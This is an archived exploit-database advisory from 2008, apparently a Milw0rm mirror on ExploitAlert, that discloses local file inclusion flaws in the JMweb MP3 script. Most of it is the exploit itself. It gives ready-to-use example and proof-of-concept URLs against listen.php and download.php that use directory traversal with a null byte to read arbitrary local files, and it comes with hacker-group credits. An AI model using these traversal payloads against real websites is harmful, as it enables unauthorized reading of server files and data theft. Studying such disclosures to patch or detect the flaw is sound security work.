|
|
| Details : ExploitAlert |
|
|
Topic : | JMweb Multiple (src) Local File Inclusion Vulnerabilities
|
ExploitAlert : 4847
Milw0rm ID : 6669
Credit : SirGod
Date : 6.10.2008
Download
 Exploit Code : ###########################################################################
######################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz :
E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str
0ke,Codex
###########################################################################
#######################
# Script Homepage:
# http://www.jesse-web.co.cc //
[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip
[+] Local File Inclusion
Example 1 :
http://[target]/[path]/listen.php?src=[Local File]%00
PoC 1 :
http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00
Example 2 :
http://[target]/[path]/download.php?src=[Local File]%00
PoC 2 :
http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00
###########################################################################
#######################
|
|
|
|